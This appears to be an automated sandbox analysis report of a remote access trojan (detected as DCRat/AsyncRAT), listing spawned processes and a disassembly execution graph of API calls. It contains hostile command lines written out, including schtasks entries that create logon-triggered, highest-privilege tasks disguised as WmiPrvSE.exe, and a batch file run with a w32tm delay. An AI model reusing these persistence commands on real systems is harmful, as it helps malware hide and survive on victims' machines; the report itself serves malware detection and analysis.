                                              Start time:14:27:00
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:14:27:00
                                              Start date:05/11/2023
                                              Path:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              Imagebase:0x1b0000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1741908323.000000000258D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              • Detection: 61%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "KQihinlofznONtA" /sc ONLOGON /tr "'C:\PerfLogs\KQihinlofznONtA.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff76f990000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:6
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\WmiPrvSE.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff76f990000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:7
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff76f990000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:8
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\PerfLogs\KQihinlofznONtA.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\PerfLogs\KQihinlofznONtA.exe
                                              Imagebase:0x7ff7699e0000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1816721235.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\PerfLogs\KQihinlofznONtA.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              • Detection: 61%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              Imagebase:0x5f0000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 88%, ReversingLabs
                                              • Detection: 61%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat"
                                              Imagebase:0x7ff7b7850000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\chcp.com
                                              Wow64 process (32bit):false
                                              Commandline:chcp 65001
                                              Imagebase:0x7ff663bb0000
                                              File size:14'848 bytes
                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:13
                                              Start time:14:27:03
                                              Start date:05/11/2023
                                              Path:C:\Windows\System32\w32tm.exe
                                              Wow64 process (32bit):false
                                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              Imagebase:0x7ff6768b0000
                                              File size:108'032 bytes
                                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:14
                                              Start time:14:27:08
                                              Start date:05/11/2023
                                              Path:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\Adobe\hui.exe"
                                              Imagebase:0x310000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low
                                              Has exited:true

                                              Target ID:18
                                              Start time:14:28:18
                                              Start date:05/11/2023
                                              Path:C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
                                              Imagebase:0x860000
                                              File size:944'128 bytes
                                              MD5 hash:1B46DAD7064609344351AC9EFE3F9AAB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:9%
                                                Total number of Nodes:1544
                                                Total number of Limit Nodes:38
                                                execution_graph 24856 7d1075 82 API calls pre_c_initialization 24857 7e5c77 121 API calls __vswprintf_c_l 22954 7ed573 22955 7ed580 22954->22955 22962 7dddd1 22955->22962 22973 7dddff 22962->22973 22965 7d400a 22996 7d3fdd 22965->22996 22968 7eac74 PeekMessageW 22969 7eac8f GetMessageW 22968->22969 22970 7eacc8 22968->22970 22971 7eacb4 TranslateMessage DispatchMessageW 22969->22971 22972 7eaca5 IsDialogMessageW 22969->22972 22971->22970 22972->22970 22972->22971 22979 7dd28a 22973->22979 22976 7dddfc 22976->22965 22977 7dde22 LoadStringW 22977->22976 22978 7dde39 LoadStringW 22977->22978 22978->22976 22984 7dd1c3 22979->22984 22981 7dd2a7 22982 7dd2bc 22981->22982 22992 7dd2c8 26 API calls 22981->22992 22982->22976 22982->22977 22985 7dd1de 22984->22985 22991 7dd1d7 _strncpy 22984->22991 22987 7dd202 22985->22987 22993 7e1596 WideCharToMultiByte 22985->22993 22988 7dd233 22987->22988 22994 7ddd6b 50 API calls __vsnprintf 22987->22994 22995 7f58d9 26 API calls 3 library calls 22988->22995 22991->22981 22992->22982 22993->22987 22994->22988 22995->22991 22997 7d3ff4 __vswprintf_c_l 22996->22997 23000 7f5759 22997->23000 23003 7f3837 23000->23003 23004 7f385f 23003->23004 23005 7f3877 23003->23005 23020 7f895a 20 API calls __dosmaperr 23004->23020 23005->23004 23007 7f387f 23005->23007 23022 7f3dd6 23007->23022 23008 7f3864 23021 7f8839 26 API calls ___std_exception_copy 23008->23021 23013 7eec4a DloadUnlock 5 API calls 23015 7d3ffe SetDlgItemTextW 23013->23015 23014 7f3907 23031 7f4186 51 API calls 3 library calls 23014->23031 23015->22968 23018 7f3912 23032 7f3e59 20 API calls _free 23018->23032 23019 7f386f 23019->23013 23020->23008 23021->23019 23023 7f3df3 23022->23023 23029 7f388f 23022->23029 23023->23029 23033 7f8fa5 GetLastError 23023->23033 23025 7f3e14 23054 7f90fa 38 API calls __cftof 23025->23054 23027 7f3e2d 23055 7f9127 38 API calls __cftof 23027->23055 23030 7f3da1 20 API calls 2 library calls 23029->23030 23030->23014 23031->23018 23032->23019 23034 7f8fbb 23033->23034 23035 7f8fc7 23033->23035 23056 7fa61b 11 API calls 2 library calls 23034->23056 23057 7f85a9 20 API calls 2 library calls 23035->23057 23038 7f8fc1 23038->23035 23040 7f9010 SetLastError 23038->23040 23039 7f8fd3 23041 7f8fdb 23039->23041 23064 7fa671 11 API calls 2 library calls 23039->23064 23040->23025 23058 7f84de 23041->23058 23044 7f8ff0 23044->23041 23045 7f8ff7 23044->23045 23065 7f8e16 20 API calls __dosmaperr 23045->23065 23046 7f8fe1 23048 7f901c SetLastError 23046->23048 23066 7f8566 38 API calls _abort 23048->23066 23049 7f9002 23051 7f84de _free 20 API calls 23049->23051 23053 7f9009 23051->23053 23053->23040 23053->23048 23054->23027 23055->23029 23056->23038 23057->23039 23059 7f84e9 RtlFreeHeap 23058->23059 23060 7f8512 __dosmaperr 23058->23060 23059->23060 23061 7f84fe 23059->23061 23060->23046 23067 7f895a 20 API calls __dosmaperr 23061->23067 23063 7f8504 GetLastError 23063->23060 23064->23044 23065->23049 23067->23063 24862 7efc60 51 API calls 2 library calls 24864 7f3460 RtlUnwind 24865 7f9c60 71 API calls _free 24866 7f9e60 31 API calls 2 library calls 23996 7edc5d 23998 7edc2e 23996->23998 23997 7edf59 ___delayLoadHelper2@8 19 API calls 23997->23998 23998->23996 23998->23997 23999 7d9b59 24000 7d9bd7 23999->24000 24003 7d9b63 23999->24003 24001 7d9bad SetFilePointer 24001->24000 24002 7d9bcd GetLastError 24001->24002 24002->24000 24003->24001 24908 7e9b50 GdipDisposeImage GdipFree __except_handler4 24868 7f8050 8 API calls ___vcrt_uninitialize 24910 7ed34e DialogBoxParamW 24870 7e8c40 GetClientRect 24871 7eec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24872 7f3040 5 API calls 2 library calls 24912 7ebe49 98 API calls 3 library calls 24914 7ebe49 103 API calls 4 library calls 24873 7ea430 73 API calls 24723 7d9f2f 24724 7d9f3d 24723->24724 24725 7d9f44 24723->24725 24726 7d9f4a GetStdHandle 24725->24726 24733 7d9f55 24725->24733 24726->24733 24727 7d9fa9 WriteFile 24727->24733 24728 7d9f7c WriteFile 24729 7d9f7a 24728->24729 24728->24733 24729->24728 24729->24733 24731 7da031 24735 7d7061 75 API calls 24731->24735 24733->24724 24733->24727 24733->24728 24733->24729 24733->24731 24734 7d6e18 60 API calls 24733->24734 24734->24733 24735->24724 24874 7d1025 29 API calls pre_c_initialization 24920 7f1522 RaiseException 24875 8016e0 CloseHandle 24921 7ebe49 108 API calls 4 library calls 24923 7d6110 80 API calls 24924 7fb710 GetProcessHeap 24749 7ec40e 24750 7ec4c7 24749->24750 24757 7ec42c _wcschr 24749->24757 24751 7ec4e5 24750->24751 24768 7ebe49 _wcsrchr 24750->24768 24784 7ece22 24750->24784 24754 7ece22 18 API calls 24751->24754 24751->24768 24753 7eaa36 ExpandEnvironmentStringsW 24753->24768 24754->24768 24755 7eca8d 24757->24750 24758 7e17ac CompareStringW 24757->24758 24758->24757 24759 7ec11d SetWindowTextW 24759->24768 24762 7f35de 22 API calls 24762->24768 24764 7ebf0b SetFileAttributesW 24765 7ebfc5 GetFileAttributesW 24764->24765 24777 7ebf25 ___scrt_fastfail 24764->24777 24765->24768 24769 7ebfd7 DeleteFileW 24765->24769 24768->24753 24768->24755 24768->24759 24768->24762 24768->24764 24770 7ec2e7 GetDlgItem SetWindowTextW SendMessageW 24768->24770 24773 7ec327 SendMessageW 24768->24773 24778 7e17ac CompareStringW 24768->24778 24779 7e9da4 GetCurrentDirectoryW 24768->24779 24781 7da52a 7 API calls 24768->24781 24782 7da4b3 FindClose 24768->24782 24783 7eab9a 76 API calls ___std_exception_copy 24768->24783 24769->24768 24771 7ebfe8 24769->24771 24770->24768 24772 7d400a _swprintf 51 API calls 24771->24772 24774 7ec008 GetFileAttributesW 24772->24774 24773->24768 24774->24771 24775 7ec01d MoveFileW 24774->24775 24775->24768 24776 7ec035 MoveFileExW 24775->24776 24776->24768 24777->24765 24777->24768 24780 7db4f7 52 API calls 2 library calls 24777->24780 24778->24768 24779->24768 24780->24777 24781->24768 24782->24768 24783->24768 24785 7ece2c ___scrt_fastfail 24784->24785 24786 7ecf1b 24785->24786 24792 7ed08a 24785->24792 24807 7e17ac CompareStringW 24785->24807 24788 7da180 4 API calls 24786->24788 24789 7ecf30 24788->24789 24790 7ecf4f ShellExecuteExW 24789->24790 24808 7db239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24789->24808 24790->24792 24798 7ecf62 24790->24798 24792->24751 24793 7ecf47 24793->24790 24794 7ecf9b 24809 7ed2e6 6 API calls 24794->24809 24795 7ecff1 CloseHandle 24796 7ed00a 24795->24796 24797 7ecfff 24795->24797 24796->24792 24803 7ed081 ShowWindow 24796->24803 24810 7e17ac CompareStringW 24797->24810 24798->24794 24798->24795 24800 7ecf91 ShowWindow 24798->24800 24800->24794 24802 7ecfb3 24802->24795 24804 7ecfc6 GetExitCodeProcess 24802->24804 24803->24792 24804->24795 24805 7ecfd9 24804->24805 24805->24795 24807->24786 24808->24793 24809->24802 24810->24796 24876 7eec0b 28 API calls 2 library calls 24926 7edb0b 19 API calls ___delayLoadHelper2@8 24927 7d1f05 126 API calls __EH_prolog 24816 7eea00 24817 7eea08 pre_c_initialization 24816->24817 24834 7f8292 24817->24834 24819 7eea13 pre_c_initialization 24841 7ee600 24819->24841 24821 7eea9c 24849 7eef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24821->24849 24823 7eea28 __RTC_Initialize 24823->24821 24825 7ee7a1 pre_c_initialization 29 API calls 24823->24825 24824 7eeaa3 ___scrt_initialize_default_local_stdio_options 24826 7eea41 pre_c_initialization 24825->24826 24826->24821 24827 7eea52 24826->24827 24846 7ef15b InitializeSListHead 24827->24846 24829 7eea57 pre_c_initialization __except_handler4 24847 7ef167 30 API calls 2 library calls 24829->24847 24831 7eea7a pre_c_initialization 24848 7f8332 38 API calls 3 library calls 24831->24848 24833 7eea85 pre_c_initialization 24835 7f82c4 24834->24835 24836 7f82a1 24834->24836 24835->24819 24836->24835 24850 7f895a 20 API calls __dosmaperr 24836->24850 24838 7f82b4 24851 7f8839 26 API calls ___std_exception_copy 24838->24851 24840 7f82bf 24840->24819 24842 7ee60e 24841->24842 24843 7ee613 ___scrt_initialize_onexit_tables 24841->24843 24842->24843 24852 7eef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24842->24852 24843->24823 24845 7ee696 24846->24829 24847->24831 24848->24833 24849->24824 24850->24838 24851->24840 24852->24845 24928 7fabfd 6 API calls DloadUnlock 22872 7ee1f9 22873 7ee203 22872->22873 22876 7edf59 22873->22876 22904 7edc67 22876->22904 22878 7edf73 22879 7edfd0 22878->22879 22883 7edff4 22878->22883 22880 7eded7 DloadReleaseSectionWriteAccess 11 API calls 22879->22880 22881 7edfdb RaiseException 22880->22881 22882 7ee1c9 22881->22882 22923 7eec4a 22882->22923 22885 7ee06c LoadLibraryExA 22883->22885 22888 7ee0cd 22883->22888 22892 7ee0df 22883->22892 22900 7ee19b 22883->22900 22887 7ee07f GetLastError 22885->22887 22885->22888 22886 7ee1d8 22889 7ee0a8 22887->22889 22890 7ee092 22887->22890 22888->22892 22893 7ee0d8 FreeLibrary 22888->22893 22894 7eded7 DloadReleaseSectionWriteAccess 11 API calls 22889->22894 22890->22888 22890->22889 22891 7ee13d GetProcAddress 22895 7ee14d GetLastError 22891->22895 22891->22900 22892->22891 22892->22900 22893->22892 22897 7ee0b3 RaiseException 22894->22897 22898 7ee160 22895->22898 22897->22882 22899 7eded7 DloadReleaseSectionWriteAccess 11 API calls 22898->22899 22898->22900 22901 7ee181 RaiseException 22899->22901 22915 7eded7 22900->22915 22902 7edc67 ___delayLoadHelper2@8 11 API calls 22901->22902 22903 7ee198 22902->22903 22903->22900 22905 7edc99 22904->22905 22906 7edc73 22904->22906 22905->22878 22930 7edd15 22906->22930 22909 7edc94 22940 7edc9a 22909->22940 22912 7edf24 22913 7eec4a DloadUnlock 5 API calls 22912->22913 22914 7edf55 22913->22914 22914->22878 22916 7edf0b 22915->22916 22917 7edee9 22915->22917 22916->22882 22918 7edd15 DloadLock 8 API calls 22917->22918 22919 7edeee 22918->22919 22920 7edf06 22919->22920 22921 7ede67 DloadProtectSection 3 API calls 22919->22921 22949 7edf0f 8 API calls DloadUnlock 22920->22949 22921->22920 22924 7eec55 IsProcessorFeaturePresent 22923->22924 22925 7eec53 22923->22925 22927 7ef267 22924->22927 22925->22886 22950 7ef22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22927->22950 22929 7ef34a 22929->22886 22931 7edc9a DloadUnlock 3 API calls 22930->22931 22932 7edd2a 22931->22932 22933 7eec4a DloadUnlock 5 API calls 22932->22933 22934 7edc78 22933->22934 22934->22909 22935 7ede67 22934->22935 22937 7ede7c DloadObtainSection 22935->22937 22936 7ede82 22936->22909 22937->22936 22938 7edeb7 VirtualProtect 22937->22938 22948 7edd72 VirtualQuery GetSystemInfo 22937->22948 22938->22936 22941 7edcab 22940->22941 22942 7edca7 22940->22942 22943 7edcaf 22941->22943 22944 7edcb3 GetModuleHandleW 22941->22944 22942->22912 22943->22912 22945 7edcc9 GetProcAddress 22944->22945 22947 7edcc5 22944->22947 22946 7edcd9 GetProcAddress 22945->22946 22945->22947 22946->22947 22947->22912 22948->22938 22949->22916 22950->22929 24929 7eebf7 20 API calls 23073 7eaee0 23074 7eaeea __EH_prolog 23073->23074 23236 7d130b 23074->23236 23077 7eaf2c 23080 7eaf39 23077->23080 23081 7eafa2 23077->23081 23141 7eaf18 23077->23141 23078 7eb5cb 23308 7ecd2e 23078->23308 23084 7eaf3e 23080->23084 23085 7eaf75 23080->23085 23083 7eb041 GetDlgItemTextW 23081->23083 23088 7eafbc 23081->23088 23083->23085 23089 7eb077 23083->23089 23095 7dddd1 53 API calls 23084->23095 23084->23141 23096 7eaf96 KiUserCallbackDispatcher 23085->23096 23085->23141 23086 7eb5e9 SendMessageW 23087 7eb5f7 23086->23087 23090 7eb600 SendDlgItemMessageW 23087->23090 23091 7eb611 GetDlgItem SendMessageW 23087->23091 23094 7dddd1 53 API calls 23088->23094 23092 7eb08f GetDlgItem 23089->23092 23234 7eb080 23089->23234 23090->23091 23326 7e9da4 GetCurrentDirectoryW 23091->23326 23098 7eb0a4 SendMessageW SendMessageW 23092->23098 23099 7eb0c5 SetFocus 23092->23099 23100 7eafde SetDlgItemTextW 23094->23100 23101 7eaf58 23095->23101 23096->23141 23097 7eb641 GetDlgItem 23102 7eb65e 23097->23102 23103 7eb664 SetWindowTextW 23097->23103 23098->23099 23104 7eb0d5 23099->23104 23119 7eb0ed 23099->23119 23105 7eafec 23100->23105 23348 7d1241 SHGetMalloc 23101->23348 23102->23103 23327 7ea2c7 GetClassNameW 23103->23327 23108 7dddd1 53 API calls 23104->23108 23113 7eaff9 GetMessageW 23105->23113 23105->23141 23112 7eb0df 23108->23112 23109 7eaf5f 23114 7eaf63 SetDlgItemTextW 23109->23114 23109->23141 23110 7eb56b 23115 7dddd1 53 API calls 23110->23115 23349 7ecb5a 23112->23349 23118 7eb010 IsDialogMessageW 23113->23118 23113->23141 23114->23141 23120 7eb57b SetDlgItemTextW 23115->23120 23118->23105 23123 7eb01f TranslateMessage DispatchMessageW 23118->23123 23124 7dddd1 53 API calls 23119->23124 23121 7eb58f 23120->23121 23125 7dddd1 53 API calls 23121->23125 23123->23105 23127 7eb124 23124->23127 23129 7eb5b8 23125->23129 23126 7eb6af 23133 7eb6df 23126->23133 23138 7dddd1 53 API calls 23126->23138 23128 7d400a _swprintf 51 API calls 23127->23128 23134 7eb136 23128->23134 23136 7dddd1 53 API calls 23129->23136 23130 7eb0e6 23246 7da04f 23130->23246 23132 7ebdf5 98 API calls 23132->23126 23135 7eb797 23133->23135 23140 7ebdf5 98 API calls 23133->23140 23139 7ecb5a 16 API calls 23134->23139 23142 7eb847 23135->23142 23172 7eb825 23135->23172 23179 7dddd1 53 API calls 23135->23179 23136->23141 23145 7eb6c2 SetDlgItemTextW 23138->23145 23139->23130 23147 7eb6fa 23140->23147 23148 7eb859 23142->23148 23149 7eb850 EnableWindow 23142->23149 23143 7eb17f 23252 7ea322 SetCurrentDirectoryW 23143->23252 23144 7eb174 GetLastError 23144->23143 23146 7dddd1 53 API calls 23145->23146 23151 7eb6d6 SetDlgItemTextW 23146->23151 23153 7eb70c 23147->23153 23167 7eb731 23147->23167 23158 7eb876 23148->23158 23367 7d12c8 GetDlgItem EnableWindow 23148->23367 23149->23148 23151->23133 23152 7eb195 23156 7eb19e GetLastError 23152->23156 23157 7eb1ac 23152->23157 23365 7e9635 32 API calls 23153->23365 23154 7eb78a 23159 7ebdf5 98 API calls 23154->23159 23156->23157 23164 7eb227 23157->23164 23170 7eb237 23157->23170 23171 7eb1c4 GetTickCount 23157->23171 23160 7eb89d 23158->23160 23163 7eb895 SendMessageW 23158->23163 23159->23135 23160->23141 23165 7dddd1 53 API calls 23160->23165 23162 7eb86c 23368 7d12c8 GetDlgItem EnableWindow 23162->23368 23163->23160 23169 7eb46c 23164->23169 23164->23170 23173 7eb8b6 SetDlgItemTextW 23165->23173 23166 7eb725 23166->23167 23167->23154 23180 7ebdf5 98 API calls 23167->23180 23268 7d12e6 GetDlgItem ShowWindow 23169->23268 23175 7eb24f GetModuleFileNameW 23170->23175 23176 7eb407 23170->23176 23177 7d400a _swprintf 51 API calls 23171->23177 23366 7e9635 32 API calls 23172->23366 23173->23141 23359 7deb3a 80 API calls 23175->23359 23176->23085 23188 7dddd1 53 API calls 23176->23188 23183 7eb1dd 23177->23183 23179->23135 23185 7eb75f 23180->23185 23181 7eb47c 23269 7d12e6 GetDlgItem ShowWindow 23181->23269 23253 7d971e 23183->23253 23184 7eb844 23184->23142 23185->23154 23189 7eb768 DialogBoxParamW 23185->23189 23187 7eb275 23191 7d400a _swprintf 51 API calls 23187->23191 23192 7eb41b 23188->23192 23189->23085 23189->23154 23190 7eb486 23193 7dddd1 53 API calls 23190->23193 23194 7eb297 CreateFileMappingW 23191->23194 23195 7d400a _swprintf 51 API calls 23192->23195 23197 7eb490 SetDlgItemTextW 23193->23197 23198 7eb2f9 GetCommandLineW 23194->23198 23230 7eb376 __vswprintf_c_l 23194->23230 23199 7eb439 23195->23199 23270 7d12e6 GetDlgItem ShowWindow 23197->23270 23203 7eb30a 23198->23203 23212 7dddd1 53 API calls 23199->23212 23200 7eb203 23204 7eb20a GetLastError 23200->23204 23205 7eb215 23200->23205 23201 7eb381 ShellExecuteExW 23227 7eb39e 23201->23227 23360 7eab2e SHGetMalloc 23203->23360 23204->23205 23261 7d9653 23205->23261 23206 7eb4a2 SetDlgItemTextW GetDlgItem 23209 7eb4bf GetWindowLongW SetWindowLongW 23206->23209 23210 7eb4d7 23206->23210 23209->23210 23271 7ebdf5 23210->23271 23211 7eb326 23361 7eab2e SHGetMalloc 23211->23361 23212->23085 23216 7eb332 23362 7eab2e SHGetMalloc 23216->23362 23218 7eb3e1 23218->23176 23224 7eb3f7 UnmapViewOfFile CloseHandle 23218->23224 23219 7ebdf5 98 API calls 23221 7eb4f3 23219->23221 23220 7eb33e 23363 7decad 80 API calls ___scrt_fastfail 23220->23363 23296 7ed0f5 23221->23296 23224->23176 23226 7eb355 MapViewOfFile 23226->23230 23227->23218 23228 7eb3cd Sleep 23227->23228 23228->23218 23228->23227 23229 7ebdf5 98 API calls 23233 7eb519 23229->23233 23230->23201 23231 7eb542 23364 7d12c8 GetDlgItem EnableWindow 23231->23364 23233->23231 23235 7ebdf5 98 API calls 23233->23235 23234->23085 23234->23110 23235->23231 23237 7d136d 23236->23237 23238 7d1314 23236->23238 23370 7dda71 GetWindowLongW SetWindowLongW 23237->23370 23240 7d137a 23238->23240 23369 7dda98 62 API calls 2 library calls 23238->23369 23240->23077 23240->23078 23240->23141 23242 7d1336 23242->23240 23243 7d1349 GetDlgItem 23242->23243 23243->23240 23244 7d1359 23243->23244 23244->23240 23245 7d135f SetWindowTextW 23244->23245 23245->23240 23247 7da059 23246->23247 23248 7da113 23247->23248 23249 7da0ea 23247->23249 23371 7da207 23247->23371 23248->23143 23248->23144 23249->23248 23250 7da207 9 API calls 23249->23250 23250->23248 23252->23152 23254 7d9728 23253->23254 23255 7d9792 CreateFileW 23254->23255 23256 7d9786 23254->23256 23255->23256 23257 7d97e4 23256->23257 23258 7db66c 2 API calls 23256->23258 23257->23200 23259 7d97cb 23258->23259 23259->23257 23260 7d97cf CreateFileW 23259->23260 23260->23257 23262 7d9688 23261->23262 23263 7d9677 23261->23263 23262->23164 23263->23262 23264 7d968a 23263->23264 23265 7d9683 23263->23265 23423 7d96d0 23264->23423 23418 7d9817 23265->23418 23268->23181 23269->23190 23270->23206 23272 7ebdff __EH_prolog 23271->23272 23273 7eb4e5 23272->23273 23438 7eaa36 23272->23438 23273->23219 23275 7ebe36 _wcsrchr 23275->23273 23277 7eaa36 ExpandEnvironmentStringsW 23275->23277 23278 7ec11d SetWindowTextW 23275->23278 23283 7ebf0b SetFileAttributesW 23275->23283 23288 7ec2e7 GetDlgItem SetWindowTextW SendMessageW 23275->23288 23291 7ec327 SendMessageW 23275->23291 23442 7e17ac CompareStringW 23275->23442 23443 7e9da4 GetCurrentDirectoryW 23275->23443 23445 7da52a 7 API calls 23275->23445 23446 7da4b3 FindClose 23275->23446 23447 7eab9a 76 API calls ___std_exception_copy 23275->23447 23448 7f35de 23275->23448 23277->23275 23278->23275 23284 7ebfc5 GetFileAttributesW 23283->23284 23295 7ebf25 ___scrt_fastfail 23283->23295 23284->23275 23287 7ebfd7 DeleteFileW 23284->23287 23287->23275 23289 7ebfe8 23287->23289 23288->23275 23290 7d400a _swprintf 51 API calls 23289->23290 23292 7ec008 GetFileAttributesW 23290->23292 